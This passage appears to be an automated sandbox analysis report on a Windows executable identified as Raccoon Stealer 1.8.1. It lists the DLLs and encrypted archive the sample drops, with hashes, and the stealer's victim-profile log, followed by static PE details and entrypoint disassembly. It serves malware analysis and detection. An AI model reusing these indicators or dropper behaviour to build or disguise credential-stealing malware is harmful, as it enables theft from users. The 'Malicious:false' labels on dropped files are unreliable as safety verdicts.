                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L...{>.\.........."!.....z...................................................@......j.....@A........................@...t.......,.... ..x....................0..l.......T...................T.......h...@...................l........................text....x.......z.................. ..`.rdata..^e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..l....0......................@..B........................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\msvcp140.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):440120
                                                                                                  Entropy (8bit):6.652844702578311
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
                                                                                                  MD5:109F0F02FD37C84BFC7508D4227D7ED5
                                                                                                  SHA1:EF7420141BB15AC334D3964082361A460BFDB975
                                                                                                  SHA-256:334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
                                                                                                  SHA-512:46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nss3.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1245136
                                                                                                  Entropy (8bit):6.766715162066988
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24576:ido5Js2a56/+VwJebKj5KYFsRjzx5ZxKV6D1Z4Go/LCiytoxq2Zwn5hCM4MSRdY8:Q2aY4w6aozx5ZWMM7yew8MSRK1y
                                                                                                  MD5:02CC7B8EE30056D5912DE54F1BDFC219
                                                                                                  SHA1:A6923DA95705FB81E368AE48F93D28522EF552FB
                                                                                                  SHA-256:1989526553FD1E1E49B0FEA8036822CA062D3D39C4CAB4A37846173D0F1753D5
                                                                                                  SHA-512:0D5DFCF4FB19B27246FA799E339D67CD1B494427783F379267FB2D10D615FFB734711BAB2C515062C078F990A44A36F2D15859B1DACD4143DCC35B5C0CEE0EF5
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c.4.'.Z.'.Z.'.Z.....3.Z...[.%.Z.B..#.Z...Y.*.Z..._.-.Z...^.,.Z...[./.Z..[.$.Z.'.[...Z..^.-.Z..Z.&.Z...&.Z..X.&.Z.Rich'.Z.........................PE..L....@.\.........."!.........................................................@......Q.....@................................x=..T.......p........................|......T...........................h...@............................................text............................... ..`.rdata...Q.......R..................@..@.data...tG...`..."...>..............@....rsrc...p............`..............@..@.reloc...|.......~...d..............@..B................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssckbi.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):336336
                                                                                                  Entropy (8bit):7.0315399874711995
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:8bndzEL04gF85K9autIMyEhZ/V3psPyHa9tBe1:8bndzEL04pnutIMyAp2z9tBe1
                                                                                                  MD5:BDAF9852F588C86B055C846B53D4C144
                                                                                                  SHA1:03B739430CF9EADE21C977B5B416C4DD94528C3B
                                                                                                  SHA-256:2481DA1C459A2429A933D19AD6AE514BD2AE59818246DDB67B0EF44146CED3D8
                                                                                                  SHA-512:19D9A952A3DF5703542FA52A5A780C2E04D6A132059F30715954EAC40CD1C3F3B119A29736D4A911BE85086AFE08A54A7482FA409DFD882BAC39037F9EECD7EF
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pi.Pi.Pi.(..Pi.F2h.Pi.F2j.Pi.F2l.Pi.F2m.Pi.0h.Pi.T3h.Pi.Ph.Pi.T3m.Pi.T3i.Pi.T3..Pi.T3k.Pi.Rich.Pi.........PE..L....@.\.........."!.........`......q........................................@...........@.............................P.......d.......x.......................t)..p...T..............................@............................................text.............................. ..`.rdata..>...........................@..@.data....N.......L..................@....rsrc...x...........................@..@.reloc..t).......*..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssdbm3.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):92624
                                                                                                  Entropy (8bit):6.639527605275762
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:YvNGVOt0VjOJkbH8femxfRVMNKBDuOQWL1421GlkxERC+ANcFZoZ/6tNRCwI41Pc:+NGVOiBZbcGmxXMcBqmzoCUZoZebHPAT
                                                                                                  MD5:94919DEA9C745FBB01653F3FDAE59C23
                                                                                                  SHA1:99181610D8C9255947D7B2134CDB4825BD5A25FF
                                                                                                  SHA-256:BE3987A6CD970FF570A916774EB3D4E1EDCE675E70EDAC1BAF5E2104685610B0
                                                                                                  SHA-512:1A3BB3ECADD76678A65B7CB4EBE3460D0502B4CA96B1399F9E56854141C8463A0CFCFFEDF1DEFFB7470DDFBAC3B608DC10514ECA196D19B70803FBB02188E15E
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z.Y.4.Y.4.Y.4.P...U.4...5.[.4..y.Q.4...7.X.4...1.S.4...0.R.4.{.5.[.4...5.Z.4.Y.5...4...0.A.4...4.X.4....X.4...6.X.4.RichY.4.........................PE..L....@.\.........."!.........0...............0......................................*q....@......................... ?......(@.......`..x............L.......p.......:..T...........................(;..@............0..X............................text............................... ..`.rdata..D....0... ..................@..@.data........P.......>..............@....rsrc...x....`.......@..............@..@.reloc.......p.......D..............@..B................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\pB4pD1lB4sD3.zip
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:Zip archive data, at least v2.0 to extract
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2828315
                                                                                                  Entropy (8bit):7.998625956067725
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:49152:tiGLaX5/cgbRETlc0EqgSVAx07XZiEi4qiefeEJGt5ygL0+6/qax:t9OX9alwJSVP1fnefekGt5CP
                                                                                                  MD5:1117CD347D09C43C1F2079439056ADA3
                                                                                                  SHA1:93C2CE5FC4924314318554E131CFBCD119F01AB6
                                                                                                  SHA-256:4CFADA7EB51A6C0CB26283F9C86784B2B2587C59C46A5D3DC0F06CAD2C55EE97
                                                                                                  SHA-512:FC3F85B50176C0F96898B7D744370E2FF0AA2024203B936EB1465304C1C7A56E1AC078F3FDF751F4384536602F997E745BFFF97F1D8FF2288526883185C08FAF
                                                                                                  Malicious:false
                                                                                                  Preview: PK.........znN<..{r....i......nssdbm3.dll...|...8...N..Y..6.$J.....$1...D .a.....jL.V..C...N.;....}./............$...Z,T.R.qc...Ec.=................;..{..s....p.`..A.?M.....W!.....a..?N...~e.A..W.o.....[.}...,...;.+\....Jw.|...k.......<yR.^.E.o.nxs.c...=V....,..F....cu.....w.O..[..u.{..<.w....7P...{..K~..E..w...c...z^..[Z....6.G.V.2..+.n4......1M.......w{f..nJL..{. d......M..+.. ......./.)..$X!......L..K.`.M...w.I..LA8r.IX...r...87..}........<.].r.....TWm......b6/._....a..W.lB...3.n.._...j....o.Mz.._Q........8....K.*...........gr..L..*H...v....6[*...4I...{.1g..<..>M..$G.&Y........-.....O..9\...,t..W.m.X ..Y.3.*...S<#}.".>.0RBg,...lh.s..o.....r.p8...)..3..K.v....ds.n3.+]....+....krMu._.Y\..../8T......&.BC.".u..;..e.k u$......~`.{.!.M...\W.Y.37+nQ.Z.*...3\G..5d....Z.hVL..Z.|k.5...XF.Y..lVVW..C..|.....b..\.Z...m. ..0...P.F8{].U.p..RW,n...MM.....s..._@..>Q.. ...N.>.T?WM....)9B.............mVW.......b.6{..|!......O....M....>.>.$\.%..L.zF.l...3
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\prldap60.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):24016
                                                                                                  Entropy (8bit):6.532540890393685
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:TQJMOeAdiNcNUO3qgpw6MnTmJk0llEEHAnDl3vDG8A3OPLondJJs2z:KMaNqb6MTmVllEK2p/DG8MlsQ
                                                                                                  MD5:6099C438F37E949C4C541E61E88098B7
                                                                                                  SHA1:0AD03A6F626385554A885BD742DFE5B59BC944F5
                                                                                                  SHA-256:46B005817868F91CF60BAA052EE96436FC6194CE9A61E93260DF5037CDFA37A5
                                                                                                  SHA-512:97916C72BF75C11754523E2BC14318A1EA310189807AC8059C5F3DC1049321E5A3F82CDDD62944EA6688F046EE02FF10B7DDF8876556D1690729E5029EA414A9
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:`wq[.$q[.$q[.$x#.$s[.$.9.%s[.$.9.%p[.$.9.%{[.$.9.%z[.$S;.%s[.$.8.%t[.$q[.$=[.$.8.%t[.$.8.%p[.$.8.$p[.$.8.%p[.$Richq[.$........PE..L....@.\.........."!..... ... .......%.......0...............................p......./....@..........................5......p7..x....P..x............@.......`..$...`1..T............................1..@............0..,............................text...2........ .................. ..`.rdata.......0.......$..............@..@.data...4....@.......4..............@....rsrc...x....P.......8..............@..@.reloc..$....`.......<..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\qipcap.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16336
                                                                                                  Entropy (8bit):6.437762295038996
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:aPgr1ZCb2vGJ7b20qKvFej7x0KDWpH3vUA397Ae+PjPonZwC7Qm:aYpZPGJP209F4vDG8A3OPLonZwC7X
                                                                                                  MD5:F3A355D0B1AB3CC8EFFCC90C8A7B7538
                                                                                                  SHA1:1191F64692A89A04D060279C25E4779C05D8C375
                                                                                                  SHA-256:7A589024CF0EEB59F020F91BE4FE7EE0C90694C92918A467D5277574AC25A5A2
                                                                                                  SHA-512:6A9DB921156828BCE7063E5CDC5EC5886A13BD550BA8ED88C99FA6E7869ECFBA0D0B7953A4932EB8381243CD95E87C98B91C90D4EB2B0ACD7EE87BE114A91A9E
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s6.7W..7W..7W..>/..5W...5..5W...5..6W...5..>W...5..<W...7..4W..7W..*W...4..6W...4`.6W...4..6W..Rich7W..................PE..L....B.\.........."!......................... ...............................`.......r....@..................................$..P....@..x............".......P.. .... ..T............................ ..@............ ..h............................text...P........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...x....@......................@..@.reloc.. ....P....... ..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\softokn3.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):144848
                                                                                                  Entropy (8bit):6.54005414297208
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:8Af6suip+I7FEk/oJz69sFaXeu9CoT2nIVFetBW3D2xkEMk:B6POsF4CoT2OeYMzMk
                                                                                                  MD5:4E8DF049F3459FA94AB6AD387F3561AC
                                                                                                  SHA1:06ED392BC29AD9D5FC05EE254C2625FD65925114
                                                                                                  SHA-256:25A4DAE37120426AB060EBB39B7030B3E7C1093CC34B0877F223B6843B651871
                                                                                                  SHA-512:3DD4A86F83465989B2B30C240A7307EDD1B92D5C1D5C57D47EFF287DC9DAA7BACE157017908D82E00BE90F08FF5BADB68019FFC9D881440229DCEA5038F61CD6
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....@.\.........."!.........b...............................................P.......|....@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ucrtbase.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1142072
                                                                                                  Entropy (8bit):6.809041027525523
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
                                                                                                  MD5:D6326267AE77655F312D2287903DB4D3
                                                                                                  SHA1:1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
                                                                                                  SHA-256:0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
                                                                                                  SHA-512:11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E..............o........p..................................................................Rich............................PE..L....3............!.....Z...........=.......p...............................p............@A........................`................................0..8=......$... ...T...........................H...@............................................text....Z.......Z.................. ..`.data........p.......^..............@....idata..6............l..............@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\vcruntime140.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):83784
                                                                                                  Entropy (8bit):6.890347360270656
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
                                                                                                  MD5:7587BF9CB4147022CD5681B015183046
                                                                                                  SHA1:F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
                                                                                                  SHA-256:C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
                                                                                                  SHA-512:0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\LocalLow\yH9tY9hO9gL5
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:ASCII text, with CRLF, CR line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1086
                                                                                                  Entropy (8bit):5.2830574160387265
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:m9S+jH/v2eJy6U3NetfVWLrBqhKQa70CGik/R8RA2Tvqzh:eSe32v3NetMfBgdCGik/R0A+0h
                                                                                                  MD5:2EC1521D004B232A0510736F73F39258
                                                                                                  SHA1:BE2D7A20FFC8B7CDF4E72AB329BE1F5C8019EEF7
                                                                                                  SHA-256:E5AA840CF074402943878F6364A23864004B975F4CFCD0C7B6855C67468CB12B
                                                                                                  SHA-512:73EB24A3E29D27B4214F27392C8828520270AE173952111AE3A83758EF181E4C64233D98C6BD8D8AEBCE32A7D4B072314DFC19618FB940DE2E534C3C7512C83A
                                                                                                  Malicious:false
                                                                                                  Preview: RACCOON STEALER | 1.8.1...Build compile date: Wed Sep 8 00:01:38 2021...Launched at: 2021.09.28 - 05:12:28 GMT...Bot_ID: D06ED635-68F6-4E9A-955C-4899F5F57B9A_user...Running on a desktop......-------------...... - Cookies: 0... - Passwords: 0... - Files: 0......System Information:... - System Language: English... - System TimeZone: -8 hrs... - IP: 185.189.150.72... - Location: 47.366402, 8.554600 | Zurich, Zurich, Switzerland (8001)... - ComputerName: 849224... - Username: user... - Windows version: NT 10.0... - Product name: Windows 10 Pro... - System arch: x64... - CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (4 cores)... - RAM: 8191 MB (5364 MB used)... - Screen resolution: 1280x1024... - Display devices:....0) Microsoft Basic Display Adapter......-------------......Installed Apps: ....Adobe Acrobat Reader DC (19.012.20035)....Google Chrome (85.0.4183.121)....Google Update Helper (1.3.35.451)....Java 8 Update 211 (8.0.2110.12)....Java Auto Updater (2.8.211.12)....
                                                                                                  \Device\Null
                                                                                                  Process:C:\Windows\SysWOW64\timeout.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                                  Category:dropped
                                                                                                  Size (bytes):92
                                                                                                  Entropy (8bit):4.300553674183507
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:hYFEHgARcWmFsFJQZtctFst3g4t32vov:hYFE1mFSQZi3MXt3X
                                                                                                  MD5:F74899957624A2837F2F86E8E62E92D4
                                                                                                  SHA1:1FCDAC5DEC5B0B1E00CF0247DA2A5F18566F1431
                                                                                                  SHA-256:507992A303C447D1D40D36E2E5163A237077B94F23A7089AC90A2F08682AE9BC
                                                                                                  SHA-512:E3FD14728633614B6552A75C15079AC8B04C0E8B3F49535B522C73312B1C812E30A934099AB18B507A0B4878068987D5545E90FA3747F7E7B10360EE324DB435
                                                                                                  Malicious:false
                                                                                                  Preview: ..Waiting for 10 seconds, press CTRL+C to quit ..... 9.. 8.. 7.. 6.. 5.. 4.. 3.. 2.. 1.. 0..

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Entropy (8bit):7.764401102130978
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                                  • Clipper DOS Executable (2020/12) 0.02%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                  • VXD Driver (31/22) 0.00%
                                                                                                  File name:31cGYywxgy.exe
                                                                                                  File size:422400
                                                                                                  MD5:7739202a73e3f1c15f5f5e6f82434955
                                                                                                  SHA1:cb0d64026ee41d99bf74a1b4939442eb53e4bd84
                                                                                                  SHA256:626999cdbd44d491c59a9fd35b302f3c18d4c0599c08b53b80716661b0e803ff
                                                                                                  SHA512:72a65e7a8ff27e4620abd0f37a3525b5f9fa94453206d36a0ed36fc979e5845f7c897d3f2a615eb7034cc5ef5a2ff42da14c0515f8dbfa2df4aba5b64077a5d1
                                                                                                  SSDEEP:6144:BNh3fbG8vHkGWJB0ONivFZFPPgVCbl2/MUu0D402NGl/Bee/53PHlcqfG:rdT9bIB0TtfICJ2/z3KiBeex3PHav
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L..

                                                                                                  File Icon

                                                                                                  Icon Hash:e0e4e8beb0e4c8ea

                                                                                                  Static PE Info

                                                                                                  General

                                                                                                  Entrypoint:0x401b1e
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x5F9E828D [Sun Nov 1 09:40:29 2020 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:5
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:5
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:5
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:f98cc9327e2d65cc6189a693f26e1c1d

                                                                                                  Entrypoint Preview

                                                                                                  Instruction
                                                                                                  call 00007F386094CA1Ah
                                                                                                  jmp 00007F3860949E2Dh
                                                                                                  mov edi, edi
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  mov eax, dword ptr [ebp+08h]
                                                                                                  xor ecx, ecx
                                                                                                  cmp eax, dword ptr [0045D008h+ecx*8]
                                                                                                  je 00007F3860949FC5h
                                                                                                  inc ecx
                                                                                                  cmp ecx, 2Dh
                                                                                                  jc 00007F3860949FA3h
                                                                                                  lea ecx, dword ptr [eax-13h]
                                                                                                  cmp ecx, 11h
                                                                                                  jnbe 00007F3860949FC0h
                                                                                                  push 0000000Dh
                                                                                                  pop eax
                                                                                                  pop ebp
                                                                                                  ret
                                                                                                  mov eax, dword ptr [0045D00Ch+ecx*8]
                                                                                                  pop ebp
                                                                                                  ret
                                                                                                  add eax, FFFFFF44h
                                                                                                  push 0000000Eh
                                                                                                  pop ecx
                                                                                                  cmp ecx, eax
                                                                                                  sbb eax, eax
                                                                                                  and eax, ecx
                                                                                                  add eax, 08h
                                                                                                  pop ebp
                                                                                                  ret
                                                                                                  call 00007F386094C67Fh
                                                                                                  test eax, eax
                                                                                                  jne 00007F3860949FB8h
                                                                                                  mov eax, 0045D170h
                                                                                                  ret
                                                                                                  add eax, 08h
                                                                                                  ret
                                                                                                  call 00007F386094C66Ch
                                                                                                  test eax, eax
                                                                                                  jne 00007F3860949FB8h
                                                                                                  mov eax, 0045D174h
                                                                                                  ret
                                                                                                  add eax, 0Ch
                                                                                                  ret
                                                                                                  mov edi, edi
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  push esi
                                                                                                  call 00007F3860949F97h
                                                                                                  mov ecx, dword ptr [ebp+08h]
                                                                                                  push ecx
                                                                                                  mov dword ptr [eax], ecx
                                                                                                  call 00007F3860949F37h
                                                                                                  pop ecx
                                                                                                  mov esi, eax
                                                                                                  call 00007F3860949F71h
                                                                                                  mov dword ptr [eax], esi
                                                                                                  pop esi
                                                                                                  pop ebp
                                                                                                  ret
                                                                                                  push 0000000Ch
                                                                                                  push 0045B5D8h
                                                                                                  call 00007F386094AD3Ah
                                                                                                  mov ecx, dword ptr [ebp+08h]
                                                                                                  xor edi, edi
                                                                                                  cmp ecx, edi
                                                                                                  jbe 00007F3860949FE0h
                                                                                                  push FFFFFFE0h
                                                                                                  pop eax
                                                                                                  xor edx, edx
                                                                                                  div ecx
                                                                                                  cmp eax, dword ptr [ebp+0Ch]
                                                                                                  sbb eax, eax
                                                                                                  inc eax
                                                                                                  jne 00007F3860949FD1h
                                                                                                  call 00007F3860949F43h
                                                                                                  mov dword ptr [eax], 0000000Ch
                                                                                                  push edi
                                                                                                  push edi
                                                                                                  push edi

                                                                                                  Data Directories

                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x5c1a00x52.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x5b92c0x3c.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xe30000xa8f0.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x591c00x1c.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x5a4800x40.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x590000x17c.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                  Sections

                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  .text0x10000x573f00x57400False0.964479987464data7.97515614602IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                  .rdata0x590000x31f20x3200False0.2578125data4.20289808021IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .data0x5d0000x8557c0x1e00False0.118229166667data1.32325585397IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                  .rsrc0xe30000xa8f00xaa00False0.668818933824data6.06921969905IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                  Resources

                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                  RT_ICON0xe33f00xea8dataEnglishUnited States
                                                                                                  RT_ICON0xe42980x8a8dataEnglishUnited States
                                                                                                  RT_ICON0xe4b400x6c8dataEnglishUnited States
                                                                                                  RT_ICON0xe52080x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                  RT_ICON0xe57700x25a8dataEnglishUnited States
                                                                                                  RT_ICON0xe7d180x10a8dataEnglishUnited States
                                                                                                  RT_ICON0xe8dc00x988dataEnglishUnited States
                                                                                                  RT_ICON0xe97480x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                  RT_ICON0xe9c280x6c8dataEnglishUnited States
                                                                                                  RT_ICON0xea2f00x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                  RT_ICON0xea8580x25a8dataEnglishUnited States
                                                                                                  RT_ICON0xece000x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                  RT_STRING0xed4c80x424data
                                                                                                  RT_ACCELERATOR0xed2a80x50data
                                                                                                  RT_ACCELERATOR0xed2f80x20data
                                                                                                  RT_GROUP_ICON0xed2680x3edataEnglishUnited States
                                                                                                  RT_GROUP_ICON0xe9bb00x76dataEnglishUnited States
                                                                                                  RT_VERSION0xed3180x1b0data

                                                                                                  Imports

                                                                                                  DLLImport
